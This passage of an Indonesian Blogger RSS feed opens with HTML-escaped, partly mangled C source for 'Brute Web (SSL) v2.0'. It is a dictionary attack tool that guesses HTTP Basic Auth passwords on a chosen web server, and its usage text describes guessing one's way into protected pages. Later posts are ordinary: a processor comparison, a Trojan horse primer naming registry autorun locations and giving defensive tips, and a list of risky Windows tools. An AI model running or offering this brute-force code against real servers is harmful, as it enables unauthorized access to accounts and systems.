/&amp;gt; &amp;lt;br /&amp;gt; void terminate (int sig)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("terminate",FL,"[%s] has caught %d (%s)",&amp;lt;br /&amp;gt; prg_nme,sig,(sig==SIGINT)?"SIGINT":"SIGSEGV");&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* creates a TCP socket and connects it to a peer */&amp;lt;br /&amp;gt; int make_socket(char *in_host,unsigned short port_num)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; int sd, err;&amp;lt;br /&amp;gt; struct hostent *hp=NULL;&amp;lt;br /&amp;gt; struct sockaddr_in sa;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; sd=socket(AF_INET, SOCK_STREAM, 0);&amp;lt;br /&amp;gt; if (sd==-1)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("make_socket",FL,"Could not create socket-&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; hp=gethostbyname(in_host);&amp;lt;br /&amp;gt; if (!hp)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; if (h_errno==HOST_NOT_FOUND)&amp;lt;br /&amp;gt; proc_err("make_socket",FL,"Could not resolv [%s]-&amp;gt;Host not Found",in_host);&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; proc_err("make_socket",FL,"Cound not resolv [%s]-&amp;gt;DNS error",in_host);&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; bzero(&amp;amp;sa,sizeof(sa));&amp;lt;br /&amp;gt; sa.sin_family=hp-&amp;gt;h_addrtype;&amp;lt;br /&amp;gt; bcopy(hp-&amp;gt;h_addr,(char *)&amp;amp;sa.sin_addr,hp-&amp;gt;h_length);&amp;lt;br /&amp;gt; sa.sin_port=htons(port_num);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; err=connect(sd, (struct sockaddr *)&amp;amp;sa,sizeof(sa));&amp;lt;br /&amp;gt; if (err==-1)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("make_socket",FL,"connect() call failed-&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; return sd;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* prints the program usage */&amp;lt;br /&amp;gt; void print_usage()&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; int x;&amp;lt;br /&amp;gt; char messages[][255] =&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; "\n\t'%s [options]'\n\n",&amp;lt;br /&amp;gt; "Options:\n",&amp;lt;br /&amp;gt; "\t-v   &amp;lt;optional&amp;gt; verbose mode (print responses to stdout)\n",&amp;lt;br /&amp;gt; "\t-z   &amp;lt;optional&amp;gt; SSL flag (use this for secure servers)\n",&amp;lt;br /&amp;gt; "\t-d   dictionary file (full path to dictionary file)\n",&amp;lt;br /&amp;gt; "\t-u   username (a user on the target webserver)\n",&amp;lt;br /&amp;gt; "\t-h   hostname (host running the webserver)\n",&amp;lt;br /&amp;gt; "\t-p   portnumber (port that the webserver runs on)\n",&amp;lt;br /&amp;gt; "\t-r   realm (the full path to the protected realm)\n\n",&amp;lt;br /&amp;gt; "Example:\n",&amp;lt;br /&amp;gt; "\tSay everytime I type https://www.somewhere.com/protected\n",&amp;lt;br /&amp;gt; "\tinto netscape, a box pops up and asks me to enter in a\n",&amp;lt;br /&amp;gt; "\tUser ID and password. Well, I have no idea what User ID\n",&amp;lt;br /&amp;gt; "\tor password to enter in, so I'll try to 'guess' my way in.\n",&amp;lt;br /&amp;gt; "\tI have a dictionary file in /tmp/dict.txt. Next I'll guess\n",&amp;lt;br /&amp;gt; "\ta username of \"foo\". Now I can type a command like:\n",&amp;lt;br /&amp;gt; "\n",&amp;lt;br /&amp;gt; " %s -z -d /tmp/dict.txt -u foo -h www.somewhere.com -p 443 -r /protected\n",&amp;lt;br /&amp;gt; "\n",&amp;lt;br /&amp;gt; "\tNow with any luck I'll eventually see a username and password.\n",&amp;lt;br /&amp;gt; "\ti.e:   ----USERNAME=foo   PASSWORD=foopass----\n\n",&amp;lt;br /&amp;gt; "\0"   &amp;lt;br /&amp;gt; };&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; fprintf(stderr,"\n-- Brute Web (SSL) v2.0 --\n");&amp;lt;br /&amp;gt; for(x=0; *messages[x]!='\0';x++)&amp;lt;br /&amp;gt; fprintf(stderr, messages[x], prg_nme);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* brute_ssl */&amp;lt;br /&amp;gt; int main (unsigned int argc,char **argv, char **envp)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; int err=0, sd,in_port=0, try=0;&amp;lt;br /&amp;gt; char c, *export_buf=NULL;&amp;lt;br /&amp;gt; SSL *ssl_con=NULL;&amp;lt;br /&amp;gt; SSL_CTX *ssl_ctx=NULL;&amp;lt;br /&amp;gt; unsigned long ssl_err;&amp;lt;br /&amp;gt; FILE *dict_fd=NULL;&amp;lt;br /&amp;gt; char *dict_name=NULL,*in_host=NULL;&amp;lt;br /&amp;gt; char *user=NULL,*realm=NULL, *dict_word=NULL;&amp;lt;br /&amp;gt; char *name_pass_buf=NULL, *encoded_buf=NULL;&amp;lt;br /&amp;gt; char *p_title=NULL;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if ((prg_nme=strrchr(argv[0],'/')))&amp;lt;br /&amp;gt; ++prg_nme;&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; prg_nme=argv[0];&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; mask=0;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; while((c=getopt(argc,argv,"vzd:u:h:p:r:"))!=EOF)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; switch(c)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; case 'v':&amp;lt;br /&amp;gt; mask|=HAS_VERBOSE;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case 'z':&amp;lt;br /&amp;gt; mask|=HAS_SSL_OPT;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case 'd':&amp;lt;br /&amp;gt; dict_name=optarg;&amp;lt;br /&amp;gt; mask|=HAS_DICTIONARY;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case 'u':&amp;lt;br /&amp;gt; user=optarg;&amp;lt;br /&amp;gt; mask|=HAS_USERNAME;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case 'h':&amp;lt;br /&amp;gt; in_host=optarg;&amp;lt;br /&amp;gt; mask|=HAS_HOSTNAME;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case 'p':&amp;lt;br /&amp;gt; in_port=atoi(optarg);&amp;lt;br /&amp;gt; if (!in_port)&amp;lt;br /&amp;gt; err++;&amp;lt;br /&amp;gt; mask|=HAS_PORTNUMBER;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case 'r':&amp;lt;br /&amp;gt; realm=optarg;&amp;lt;br /&amp;gt; mask|=HAS_REALM;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; case '?':&amp;lt;br /&amp;gt; err++;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if ((optind&amp;lt;argc)||err) dict_word="(char"&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; name_pass_buf=(char *)malloc(MAXNAMEPASSLEN);&amp;lt;br /&amp;gt; if (!name_pass_buf)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("main",FL,"Call to malloc() failed-&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; encoded_buf=(char *)malloc(MAXENCODEDSTRING);&amp;lt;br /&amp;gt; if (!encoded_buf)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("main",FL,"Call to malloc() failed-&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; export_buf=(char *)malloc(MAXSENDSTRING);&amp;lt;br /&amp;gt; if (!export_buf)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("main",FL,"Call to malloc() failed-&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; dict_fd=fopen(dict_name,"r");&amp;lt;br /&amp;gt; if (dict_fd==NULL)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("main",FL,"Could not open dictionary file-&amp;gt;%s",strerror(errno));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_SSL_OPT)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; SSLeay_add_ssl_algorithms();&amp;lt;br /&amp;gt; SSL_load_error_strings();&amp;lt;br /&amp;gt; ssl_ctx = SSL_CTX_new(SSLv2_client_method());&amp;lt;br /&amp;gt; if (!ssl_ctx)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("main",FL,"Call to SSL_CTX_new return a NULL");&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; while (read_line(dict_fd,dict_word))&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; sd=make_socket(in_host,in_port);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_SSL_OPT)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; ssl_con=SSL_new(ssl_ctx);&amp;lt;br /&amp;gt; if (!ssl_con)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; proc_err("main",FL,"SSL_new() returned NULL.");&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; SSL_set_fd (ssl_con, sd);&amp;lt;br /&amp;gt; ssl_err=SSL_connect(ssl_con);&amp;lt;br /&amp;gt; if (ssl_err&amp;lt;=0)             {                 ssl_err=ERR_get_error();                 proc_err("main",FL,"SSL_connect() failed-&amp;gt;%s\n", ERR_error_string(ssl_err,export_buf));&amp;lt;br /&amp;gt; exit(EXIT_FAILURE);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; sprintf(name_pass_buf,"%s:%s",user,dict_word);&amp;lt;br /&amp;gt; encode_string(name_pass_buf,encoded_buf);&amp;lt;br /&amp;gt; sprintf(export_buf,"GET %s HTTP/1.0\nAuthorization: Basic %s\n\n",realm, encoded_buf);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; try++;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_SSL_OPT)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; SSL_write(ssl_con,export_buf,strlen(export_buf));&amp;lt;br /&amp;gt; SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1);&amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_VERBOSE)&amp;lt;br /&amp;gt; fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; write(sd,export_buf,strlen(export_buf));&amp;lt;br /&amp;gt; socket_readln(sd,export_buf,MAXSENDSTRING-1);&amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_VERBOSE)&amp;lt;br /&amp;gt; fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (check_response(export_buf))&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; mask |=HAS_DONE_IT;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_VERBOSE)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_SSL_OPT)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; while(SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1))&amp;lt;br /&amp;gt; fprintf(stdout,"%s",export_buf);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; while(socket_readln(sd,export_buf,MAXSENDSTRING-1))&amp;lt;br /&amp;gt; fprintf(stdout,"%s",export_buf);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; close(sd);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_SSL_OPT)&amp;lt;br /&amp;gt; SSL_free(ssl_con);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_DONE_IT)&amp;lt;br /&amp;gt; fprintf(stdout,"\n\n\t----USERNAME=%s   PASSWORD=%s----\n\n",user,dict_word);&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; fprintf(stdout,"\n\n\t----Sorry, but I could not get in.----\n");&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; free(dict_word);&amp;lt;br /&amp;gt; free(name_pass_buf);&amp;lt;br /&amp;gt; free(export_buf);&amp;lt;br /&amp;gt; if (mask &amp;amp; HAS_SSL_OPT)&amp;lt;br /&amp;gt; SSL_CTX_free(ssl_ctx);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;span class="fullpost"&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span style="color: rgb(114, 45, 50);"&amp;gt;&amp;lt;/span&amp;gt;&lt;/textarea&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Script diatas bisa anda dapatkan &lt;a href="http://www.hoobie.net/security/exploits/index.html"&gt;Disini&lt;/a&gt;&lt;br /&gt;
&lt;errno.h&gt;&lt;stdio.h&gt;&lt;stdlib.h&gt;&lt;string.h&gt;&lt;stdarg.h&gt;&lt;sys h=""&gt;&lt;sys h=""&gt;&lt;sys h=""&gt;&lt;sys h=""&gt;&lt;netinet h=""&gt;&lt;netdb.h&gt;&lt;unistd.h&gt;&lt;fcntl.h&gt;&lt;signal.h&gt;&lt;rsa.h&gt;&lt;crypto.h&gt;&lt;x509.h&gt;&lt;pem.h&gt;&lt;ssl.h&gt;&lt;err.h&gt;&lt;file:%s&gt;&lt;optional&gt;&lt;optional&gt;&lt;argc)||err) call="" dict_word="(char" if="" main="" to=""&gt;&lt;errno.h&gt;&lt;stdio.h&gt;&lt;stdlib.h&gt;&lt;string.h&gt;&lt;stdarg.h&gt;&lt;sys h=""&gt;&lt;sys h=""&gt;&lt;sys h=""&gt;&lt;sys h=""&gt;&lt;netinet h=""&gt;&lt;netdb.h&gt;&lt;unistd.h&gt;&lt;fcntl.h&gt;&lt;signal.h&gt;&lt;rsa.h&gt;&lt;crypto.h&gt;&lt;x509.h&gt;&lt;pem.h&gt;&lt;ssl.h&gt;&lt;err.h&gt;&lt;file:%s&gt;&lt;optional&gt;&lt;optional&gt;&lt;argc)||err) call="" dict_word="(char" if="" main="" to=""&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/argc)||err)&gt;&lt;/optional&gt;&lt;/optional&gt;&lt;/file:%s&gt;&lt;/err.h&gt;&lt;/ssl.h&gt;&lt;/pem.h&gt;&lt;/x509.h&gt;&lt;/crypto.h&gt;&lt;/rsa.h&gt;&lt;/signal.h&gt;&lt;/fcntl.h&gt;&lt;/unistd.h&gt;&lt;/netdb.h&gt;&lt;/netinet&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/stdarg.h&gt;&lt;/string.h&gt;&lt;/stdlib.h&gt;&lt;/stdio.h&gt;&lt;/errno.h&gt;&lt;/argc)||err)&gt;&lt;/optional&gt;&lt;/optional&gt;&lt;/file:%s&gt;&lt;/err.h&gt;&lt;/ssl.h&gt;&lt;/pem.h&gt;&lt;/x509.h&gt;&lt;/crypto.h&gt;&lt;/rsa.h&gt;&lt;/signal.h&gt;&lt;/fcntl.h&gt;&lt;/unistd.h&gt;&lt;/netdb.h&gt;&lt;/netinet&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/stdarg.h&gt;&lt;/string.h&gt;&lt;/stdlib.h&gt;&lt;/stdio.h&gt;&lt;/errno.h&gt;</description><link>http://xpemula.blogspot.com/2010/05/exploit_30.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-5854946738007366598</guid><pubDate>Wed, 20 May 2009 14:43:00 +0000</pubDate><atom:updated>2009-07-08T07:31:08.986-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Perang Raksaksa Produsen Prosesor</title><description>Intel Corel7 Codename Nehalem (Corel7 920, 924, / Corel7 EE 965)&lt;br /&gt;&lt;br /&gt;Prosessor ini resmi diluncurkan bulan November 2008, sebenarnya apa saja tenologi baru yang ada pada Corel7 yang diklain "prosesor tercepat di dunia ini"?&lt;br /&gt;&lt;br /&gt;- INTEL QPI (QuickPathInterconnect) teknologi yang menggantikan sistem FSB pada prosesor Core2Duo, sehingga Corel7 ini koneksi data antar modul memori dengan prosesor dapat berjalan lebih cepat dan dengan bandwidth lebih.&lt;br /&gt;-  4 Core prosesor dengan 2thread pada masing-masing core, sehingga Corel7 ini memiliki total 8thread, dengan Vista kita akan mendapatkan 8 prosesor dalam 1 keping prosesor.&lt;br /&gt;- Integrated MCH dengan 3 channels DDR3 1066MHZ.&lt;br /&gt;- Fabrikasi 45 nm, cache 8Mb, TDP 130W, QPI 4.8 / 6,4GT/s, socket LGA 1366 untuk saat ini hanya ada 1 chipset yang benar-benar kompatibel dengan prosesor tercepat di INTEL ini, yaitu Intel X 58 Exp Chipset dengan ICH 10/10R pada SouthBridge nya.&lt;br /&gt;&lt;br /&gt;AMD Phenom Generasi ke-2&lt;br /&gt;- AMD 64 with Direct Connect Architecture, meningkatkan system performance dengan menghubungkan secara langsung prosesor, memori kontroler, dan input output kedalam keping prosesor.&lt;br /&gt;- Balance Smart Cache, menyediakan cache yang cukup untuk semua core&lt;br /&gt;- Integrated DDR2 DRAM Controller with AMD Memory Optimizer Technology&lt;br /&gt;- AMD Cool n Quiet 3.0 technology&lt;br /&gt;- Dual Dynamic Power Management, managemen power untuk efisiensi daya pada core prosesor dan memori kontroler&lt;br /&gt;- Fabrikasi 45nm, cache 8Mb, TDP 125W, HT 3.6GT/s, Socket AM2+&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Diambil dari : Fasta News 09&lt;/span&gt;</description><link>http://xpemula.blogspot.com/2009/05/perang-raksaksa-produsen-prosesor.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-7193951771756792911</guid><pubDate>Wed, 20 May 2009 14:05:00 +0000</pubDate><atom:updated>2009-07-08T07:56:22.423-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><category domain="http://www.blogger.com/atom/ns#">Virus</category><title>Berkenalan Dengan Trojan Horse</title><description>Nama Trojan Horse diambil dari mitologi Yunani pada saat perang Troya. Waktu itu pasukan yunani kesulitan untuk melumpuhkan kota troya karena troya memiliki kekuatan yang sangat tangguh. Akhirnya, sebuah strategi dijalankan. Pasukan yunani membuat seekor kuda raksasa yang terbuat dari kayu yang didalamnya diisi oleh pasukan yunani, sementara itu pasukan yunani yang lain bergerak mundur. Berkat bantuan Sinon, seorang spionase yunani, kuda kayu tersebut berhasil dibawa kedalam kota troya. Dan pada malam harinya, pasukan yang mengisi kuda kayu tersebut keluar untuk membuka pintu gerbang troya sehingga pasukan yunani yang sebelumnya berpura-pura mundur bisa masuk dan melumpuhkan kota tersebut.&lt;br /&gt;Lalu apa hubungannya antara kuda troya di jaman yunani dengan trojan horse yang dianggap sebagai hewan komputer yang membahayakan?&lt;br /&gt;Ada kesamaan antara strategi kuda troya di jaman yunani dengan konsep yang digunakan trojan horse, yaitu sama-sama mengirimkan media ke korbannya.&lt;br /&gt;Salah satu ciri dari trojan adalah selalu mempunyai 2 bagian yaitu client dan server. Dari program client kita bisa mengendalikan program server yang ditanam di komputer korban. Alhasil, komputer korban dapat kita kendalikan dari jarak jauh (remote).&lt;br /&gt;Cara kerja trojan adalah dengan menggunakan protokol TCP/IP atau adapula beberapa varian trojan yang menggunakan protokol UDP. Ketika server mulai dijalankan pada komputer korban, trojan akan menyembunyikan diri didalam sistem. Biasanya trojan akan bersembunyi pada lokasi:&lt;br /&gt;1. Start-Up Directory&lt;br /&gt;2. Registry -&lt;br /&gt;HKLM\Software\Windows\Microsoft\CurrentVersion\Run&lt;br /&gt;HKLM\Software\Windows\Microsoft\CurrentVersion\RunServices&lt;br /&gt;HKLM\Software\Windows\Microsoft\CurrentVersion\RunOnce&lt;br /&gt;HKLM\Software\Windows\Microsoft\CurrentVersion\RunServicesOnce&lt;br /&gt;HKEY_CLASSES_ROOT\exefile\shell\open\command"%1"%*&lt;br /&gt;3. Batch File&lt;br /&gt;4. Initialization File&lt;br /&gt;5. C:\Explorer.exe&lt;br /&gt;Selain lokasi-lokasi diatas, ada kemungkinan trojan bersembunyi ditempat lain seperti yang dilakukan oleh SubSeven 2.2 yang bersembunyi di:&lt;br /&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\ActiveSetup\Installed Component&lt;br /&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer|Usershell folders&lt;br /&gt;&lt;br /&gt;Salah satu contoh trojan yang memiliki fitur cukup mumpuni dan masih banyak digunakan hingga saat ini adalah NetBus. Beberapa fitur tersebut, diantaranya:&lt;br /&gt;- fungsi keylogger&lt;br /&gt;- download dan menghapus file komputer korban&lt;br /&gt;- shutdown sistem&lt;br /&gt;- screendump (fitur ini membutuhkan koneksi cepat)&lt;br /&gt;- menonaktifkan keyboard&lt;br /&gt;- mengalihkan data pada port TCP tertentu ke host atau port lain&lt;br /&gt;- konfigurasi server.exe dengan pilihan port TCP dan notifikasi email&lt;br /&gt;- dll&lt;br /&gt;&lt;br /&gt;Seiring dengan perkembangan, trojanpun terus memperbaiki diri. Salah satu trojan yang telah berevolusi adalah AWRC (atelier Web Remote Commander). Trojan yang satu ini dikatakan telah berevolusi karena ia tidak lagi membutuhkan file server untuk ditanam di komputer korban, artinya trojan ini hanya memiliki satu file client dan itu cukup untuk mengendalikan komputer korban.&lt;br /&gt;&lt;br /&gt;Beberapa hal yang bisa dilakukan untuk meminimalisir agar tidak menjadi korban trojan, antara lain:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Pasanglah Freezer : Freezer akan mengembalikan sistem pada keadaan semula seperti saat pertama kali freezer ini diaktifkan.&lt;/li&gt;&lt;li&gt;Update Antivirus : Sebagian besar antivirus yang beredar mampu memblokir kerja trojan.&lt;/li&gt;&lt;li&gt;Tasklist : Mendeteksi dengan cara melihat daftar program yang sedang berjalan atau anda bisa membuka msinfo32.exe (C:\Program Files\common files\microsoft shared\msinfo) untuk melihat daftar program yang sedang running tapi menyembunyikan diri dari tasklist.&lt;/li&gt;&lt;li&gt;Netstat : Perintah ini berfungsi untuk membuka koneksi ke dan dari komputer seseorang, dengan menjalankan perintah ini, akan menampilkan IP address dari komputer tersebut ke komputer lain yang terhubung.&lt;/li&gt;&lt;li&gt;TCP View: Free utility dari sysinternals, utility ini dapat menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk melakukan koneksi dengan komputer kita.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;</description><link>http://xpemula.blogspot.com/2009/05/berkenalan-dengan-trojan-horse_20.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-5568392068461410677</guid><pubDate>Mon, 02 Feb 2009 14:21:00 +0000</pubDate><atom:updated>2009-07-08T08:25:52.657-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Tool Berbahaya Bagi Windows</title><description>Sering kali kita tergiur begitu melihat fitur yang ditawarkan oleh sebuah software, tanpa memperhatikan kualitas dari software itu sendiri. Padahal bukan tidak mungkin software yang kita download (baik itu free ataupun yang berbayar) merupakan sebuah software di program dengan buruk (Parameter buruk tidak nya pemrograman sebuah tool, menurut para analis software dapat dilihat dari seberapa besar kesalahan pemrogramannya pada 1000 baris kode pertama, dan batas kewajaran untuk sebuah software adalah dua baris sedangkan pada software server tidak boleh melebihi dari setengah baris) dan dikategorikan sebagai software yang berbahaya. Dikategorikan berbahaya karena dapat memperlambat kinerja pc atau lebih parah lagi dapat merusak windows.&lt;br /&gt;&lt;br /&gt;Salah satu contoh dari software yang dikategorikan berbahaya adalah Smart PC Profesional.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizR_m2SIgSx_V0ftGm6gb_sLgU1SbkdWpPIOqteK6aPPjrCZcKnrORCE6wkOvqq-q_ejSUvlYuJNUdty2MbiiC-KsdMrTatdNJS-piRLm7vLBAq5ec7jWgypW6C3B3Mtuh7yakF0xtpq0/s1600-h/dxe45_1.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 197px; height: 122px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizR_m2SIgSx_V0ftGm6gb_sLgU1SbkdWpPIOqteK6aPPjrCZcKnrORCE6wkOvqq-q_ejSUvlYuJNUdty2MbiiC-KsdMrTatdNJS-piRLm7vLBAq5ec7jWgypW6C3B3Mtuh7yakF0xtpq0/s400/dxe45_1.jpg" alt="" id="BLOGGER_PHOTO_ID_5298226452733462930" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tools ini memiliki fungsi merapikan registry, tetapi ia tidak membackup file registry terlebih dahulu, akibatnya bila terjadi kesalahan, sistem akan rusak selamanya. Selain itu, tools ini ingin menghapus nilai-nilai untuk fonts yang terintegrasi dalam sistem. Hal yang sama terjadi jika tools ini berhadapan dengan file .DLL program yang aktif dan folder backup Service Pack. Tools ini juga menggolongkan file backup "&lt;span style="font-style: italic;"&gt;boot.bak&lt;/span&gt;" dan "&lt;span style="font-style: italic;"&gt;bootsec.bak&lt;/span&gt;" sebagai file &lt;span style="font-style: italic;"&gt;junk. &lt;/span&gt;Padahal file-file tersebut mengamankan boot windows bila file-file asli dengan ekstensi .INI rusak. Melalui fungsi "Windows Boots", tool ini juga mengacaukan kinerja RAM.&lt;br /&gt;&lt;br /&gt;Tools lain yang dikategorikan sebagai tools berbahaya adalah:&lt;br /&gt;1. SpyEraser: tools ini menghapus registry key  yang dianggap  sebagai spyware.&lt;br /&gt;2. GpartEd:  dapat merusak sistem pada vista.&lt;br /&gt;3. Nimo Codec Pack: Tidak memiliki pengaturan filter sehingga dapat menurunkan kualitas secara drastis&lt;br /&gt;&lt;br /&gt;Sebenarnya, masih ada beberapa tools yang dikategorikan sebagai tools berbahaya. Berikut ini tool ternama yang memiliki celah keamanan terbanyak pada tahun 2007.&lt;br /&gt;1. Yahoo Messenger 8.2.0.239&lt;br /&gt;2.Apple QuickTime 7.2&lt;br /&gt;3. Mozilla Firefox 2.0.0.6&lt;br /&gt;4. Windows Messenger 7.0 &amp;amp; 8.0&lt;br /&gt;5. Mware Player 2.0 &amp;amp; 1.0.4&lt;br /&gt;6. Apple iTunes 7.3.2&lt;br /&gt;7. Intuit QuickBooks Online Edition 9&lt;br /&gt;8. Java Runtime 1.0.6_X&lt;br /&gt;9. Yahoo Widgets 4.0.5&lt;br /&gt;10. Ask.com Toolbar 4.0.2.53&lt;br /&gt;&lt;br /&gt;Tulisan ini diambil dari majalah Chip  edisi  tahun 